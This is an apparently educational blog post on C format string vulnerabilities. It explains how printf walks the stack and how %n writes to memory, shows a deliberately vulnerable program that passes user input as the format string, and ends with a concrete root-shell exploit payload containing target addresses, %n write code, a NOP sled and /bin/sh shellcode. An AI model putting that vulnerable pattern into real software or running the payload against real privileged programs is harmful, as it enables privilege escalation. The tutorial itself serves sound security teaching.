String Format Vulnerabilities: The Epic of printf

software

October 15 2023

Did you know simply printing can be a major security vulnerability?

Important details aside, ever since 1989 it's been known that you can comprise a binary simply by exploiting the fact that it prints!

- "Wow, cool fact m8"

Introducing printf

The crux of the problem comes down to the C programming language's printf suite of functions. printf and its friends are functions that format strings of text and print them.

// introduction.c
#include <stdio.h>

int main(int argc, char **argv) {
    printf("Hello %s %s!\n", argv[1], argv[2]);
    return 0;
}

gcc introduction.c -o introduction && ./introduction 'John' 'Doe'
# Hello John Doe!

These formatted printing functions like eprintf (print to stderr), printf (print to stdout), fprintf (print to a file), and sprint (print to a buffer), etc, take in a format string and a list of arguments.

In our example, "Hello %s %s!\n" is the format string, and argv[1] and argv[2] are our arguments. The two %ss are format specifiers. A format specifier is a symbol that says "replace me with an argument in the formatted output."

The %s format specifier expects a string of characters as an argument, but other format specifiers will expect other things. %d, for instance, expects a signed decimal integer, and %x expects an unsigned hexadecimal integer.

When the printing function runs, it will go through the format string you provide and replace each format specifier with the associated argument you provide.

You can imagine the process looking something like this.

// ./introduction John Doe
printf("Hello %s %s!\n", argv[1], argv[2]);
printf("Hello John %s!\n", argv[2]);         // replace the first %s with argv[1]
printf("Hello John Doe!\n");                 // replace the second %s with argv[2]
// stdout: Hello John Doe!

These functions are super useful for debugging, writing to files, and filling buffers, and are found in a significant number of C and C++ projects.

Now, why are they dangerous and what can go wrong?

zzzprintf 😴

The problem is that they're lazy.

If you, dear reader, were implementing and testing such a function what are some behaviors you might check?

What happens when...

The argument provided to a format specifier is different than the type it expects?
You provide no format specifiers?
There are more arguments than format specifiers?
There are more format specifiers than arguments?

Consider:

printf("Date: %d-%d-%d\n", year, month);

You might notice that we have three %d format specifiers in the format string but only two arguments, perhaps we forgot the last one. There are fewer arguments than there are format specifiers.

You might imagine that you're AAA implementation of printf would do some checking, notice that 2 != 3, and throw an error.

The sad reality, my friends, is that printf does no such thing...

So what does that mean? To find out, we'll have to delve a little deeper into how these formatting functions work.

How printf works

In C, and many other programming languages, when a function is called the arguments to the function are put on a stack.

printf("Date: %d-%d-%d\n", year, month);

Stack (higher memory addresses)
0xf5ff -------- [data]
0xf4ff -------- [data]
0xf3ff -------- [data]
0xf2ff -------- month
0xf1ff -------- year
0xf0ff -------- pointer to "Date: %d-%d-%d\n"
Stack (lower memory addresses)

We say the arguments are pushed in "reverse order" because the later arguments (e.g. month) are at higher addresses in the stack than the earlier arguments (e.g. year).

One reason for this is so that when evaluating a function, later arguments are at larger offsets from the "base pointer", which tends to be more intuitive. So, for example, given a call foo(arg1, arg2) you might have stack[base + 1] = arg1 and stack[base + 2] = arg2.

printf will traverse the format string and each time it encounters a format specifier it will replace the specifier with the data at its current stack pointer and increase the pointer by the argument's size.

// "Date: {year}-%d-%d\n"
Stack (higher memory addresses)
            0xf5ff -------- [data]
            0xf4ff -------- [data]
            0xf3ff -------- [data]
            0xf2ff -------- month
pointer --> 0xf1ff -------- year
            0xf0ff -------- pointer to "Date: %d-%d-%d\n"
Stack (lower memory addresses)

// "Date: {year}-{month}-%d\n"
Stack (higher memory addresses)
            0xf5ff -------- [data]
            0xf4ff -------- [data]
            0xf3ff -------- [data]
pointer --> 0xf2ff -------- month
            0xf1ff -------- year
            0xf0ff -------- pointer to "Date: %d-%d-%d\n"
Stack (lower memory addresses)

When it encounters the third %d, it doesn't discriminate. It does the same thing, reading the data found at the pointer and formatting it as a decimal value.

// "Date: {year}-{month}-{[data]} \n"
Stack (higher memory addresses)
            0xf5ff -------- [data]
            0xf4ff -------- [data]
pointer --> 0xf3ff -------- [data]
            0xf2ff -------- month
            0xf1ff -------- year
            0xf0ff -------- pointer to "Date: %d-%d-%d\n"
Stack (lower memory addresses)

In other words, it will just format the data it finds and increase its stack pointer for every format specifier in the format string irrespective of whether or there's an associated argument.

You can imagine taking this to the extreme, with something like

printf("%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x");

which would print out a large portion of the stack frame, as hexadecimal values.

Reading the stack frame is certainly not something you want to allow. Imagine, for instance, that there is sensitive data on the stack like a password. Just because the program has access to some data doesn't mean that you want all the users of the program to have access. Though we're just getting started.

The shit really hits the fan when you introduce one last piece.

The cheeky %n

Specifier|Argument|Output
---------|--------|------
%s       |dog     |dog
%d       |10      |10
%x       |10      |a
%f       |10.0    |10.000000
%n       |0xffef  |*writes to 0xffef*

Being a contrarian, %n does not behave like the other format specifiers. It does not merely get replaced by the provided argument. Rather, it interprets the argument it receives as an address and then writes the number of characters that have been printed to that address.

In the example below,

int foo;
printf("four%n\n", &foo);
// four
printf("%d", foo);
// 4

when %n is reached the 4 characters "four" have been printed. Therefore, %n writes 4 to the provided address, &foo, the address of foo. This is equivalent to assigning 4 to foo.

In short, this means that printing can result in writing to memory. So, what could wrong? Well, suppose you could control what address you write to? And, further, suppose you could control what value you write?

That's the equation for writing to arbitrary memory!

Example

Let's look at a full example of this to see it in action.

// contrived.c
#include <stdio.h>

int check_arguments(int argc, char **argv, char buffer[]) {
    if (argc != 3) {
        sprintf(buffer, "[%s] - invalid # of arguments", argv[0]);
        return 1;
    }

    return 0;
}

int main(int argc, char **argv) {
    char buffer[512];
    if (check_arguments(argc, argv, buffer) == 1) {
        printf(buffer);
        return 1;
    }
    printf("All checks out!\n");
    return 0;
}

gcc contrived.c -o contrived
./contrived one
# [./contrived] - invalid # of arguments
./contrived one two
# All checks out!

What's the vulnerability?

On line 6 we put the contents of argv[0] into buffer. Then on line 16 we print the contents of the buffer. Crucially, buffer is the format string itself and not an argument to the format string.

An attacker could put a malicious payload into argv[0]. Then on line 6 we'd have

printf("[<malicious payload from argv[0]>] - invalid # of arguments");

for example

printf("[%x%x%x%x%x] - invalid # of arguments");

which would print some of the contents of the stack frame.

Suppose, for instance, that this program is very important and runs with root privileges. Therefore, any code it executes will be executed with root privileges. So if we craft our payload correctly, we could potentially get arbitrary code executing with root privileges.

One example of something we might want to do with root privileges is open a shell, a root shell. With a root shell we could navigate the file system, delete or create files and folders, run malicious code, etc.

"Sounds snazzy!"

Crafting a Payloading

Our final payload is going to look something like this

"<addresses><stackpop><write-code><nops><shellcode>"

We'll go through each part left to right and discuss its purpose and, broadly, how the exploit will work.

<addresses>

Remember our good friend %n? <addresses> will contain the addresses we'll have %n write to.

<stackpop>

How can we get %n to write to addresses inside of our payload? Well, remember how we explored how printf works and specifically how its internal pointer will keep moving up the stack as long as we keep providing format specifiers? Well, at some point up the stack is our buffer (the one from line 14).

<stackpop> is a bunch of %x format specifiers that will move printf's internal pointer up the stack until it reaches the start of buffer, which is conveniently where <addresses> are stored.

<write-code>

Great so currently printf's internal pointer points to some address in <addresses>. Therefore, when printf encounters a %n the address it will write to is an address we provided. So that's exactly what we do. <write-code> contains the %ns that will write to the addresses we provide.

"What address should we write to and what should be written there?"

When a function is called, the compiler stores a return address. A return address is where execution should resume from when the function returns. By overriding this address, which is stored on the stack, we can control what instructions are going to be executed when the function returns.

The return address for a function can typically be obtained using a tool like GDB. The <write-code> with override the return address (stored in <addresses>) with an address inside of our <nops> (we'll get to why next).

<nops><shellcode>

<shellcode> is what we want to execute. It will open a shell, and since the vulnerable program has root privileges, it will be a root shell. The tricky thing is that we want to start execution from exactly the start of our shell code.

shellcode = x
other     = y
RA        = updated return address

     (bad) RA    (good) RA      (bad) RA
           ▼            ▼             ▼
yyyyyyyyyyyyyyyyyyyyyyyyxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

If we start from anywhere else (even one byte off!), our program is likely going to fail. To make our lives easier, what we can do is pad the start of our code with <nops>. A NOP is a "do nothing" instruction. If we return into the <nops> (what is referred to as a NOP slide) then our instruction will execute the NOPs and then execute our shell code.

shellcode = x
other     = y
NOP       = _
RA        = updated return address

       (good) RA
              ▼
yyyyyyyyyyyyy________xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

          (good) RA
                 ▼
yyyyyyyyyyyyy________xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

            (good) RA
                   ▼
yyyyyyyyyyyyy________xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

In all three cases above, our return address points into the NOP slide so the NOPs will be executed one by one and then the shellcode will run in full!

Using a tool like GDB we can get the address of buffer. Since our NOPs are at some offset inside of our buffer, we know that the address we want the <write-code> to write is the address of buffer plus some offset. The NOPs provide some margin for error when setting the offset.

Hence, all that remains to be done is to execute contrived with our malicious payload in argv[0]!

#include <unistd.h>

char *payload = "<addresses><stackpop><write-code><nops><shellcode>";
char *program = "/path/to/contrived";

int main() {
    char *args[2];
    args[0] = payload;
    args[1] = NULL;

    // "run <program> with <args>"
    execvp(program, args);
    return 0;
}

Recalling our vulnerable code, first buffer will be created and check_arguments will be called.

int check_arguments(int argc, char **argv, char buffer[]) {
    if (argc != 3) {
        // Write to the buffer.
        sprintf(buffer, "[%s] - invalid # of arguments", argv[0]);
        return 1;
    }

    return 0;
}

since we don't provide three arguments argv[0] (our payload) will be written into buffer. Subsequently, in main we'll see that check_arguments returned 1 and we'll print the buffer.

int main(int argc, char **argv) {
    char buffer[512];
    if (check_arguments(argc, argv, buffer) == 1) {
        // Print the buffer.
        printf(buffer);
        return 1;
    }
    printf("All checks out!\n");
    return 0;
}

The printf call, with our buffer written in full, will look like this:

printf("[<addresses><stackpop><write-code><nops><shellcode>] - invalid # of arguments");

<stackpop> will move printf's internal pointer to the start of buffer where <addresses> (the return address for main) is stored.
<write-code> will write our new return address, an offset into buffer where our NOPs are stored, into the address provided in <addresses>.
main will return and jump to the new return address we set, inside of our NOPs.
The NOPs will execute, our shellcode will execute, and a root shell will be opened!

If you want to learn more about crafting these payloads or different kinds of string format exploits, I highly recommend this great article!

If you're curious about what a real payload might look like, this is a payload I wrote for a recent assignment I completed.

static char payload[] = /* <addresses>  */"\x9c\xda\xbf\xff\x9c\xda\xbf\xff\x9e\xda\xbf\xff\x9e\xda\xbf\xff"
                        /* <stackpop>   */"%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x"
                        /* <write-code> */"%54756u%n%10357u%n"
                        /* <nops>       */"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        /* <shellcode>  */"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

Conclusion

A few decades ago some developers decided to not implement checks for C's formatting functions. This, alongside the %n specifier, opened the burly gates for decades of exploits that leveraged this behavior.

In this post, we looked at the nature of string format vulnerabilities and an example exploit, whereby given a vulnerable program with root privileges, we crafted a malicious payload to create a root shell.

Although they still exist, string format vulnerabilities are far less prevalent than they previously were, as they're relatively easy to spot and protect against, in most cases. In fact, modern C and C++ compilers will typically warn you if you compile a program where user input is used as some part of a format string.

TL;DR - printf is the kiss of death :)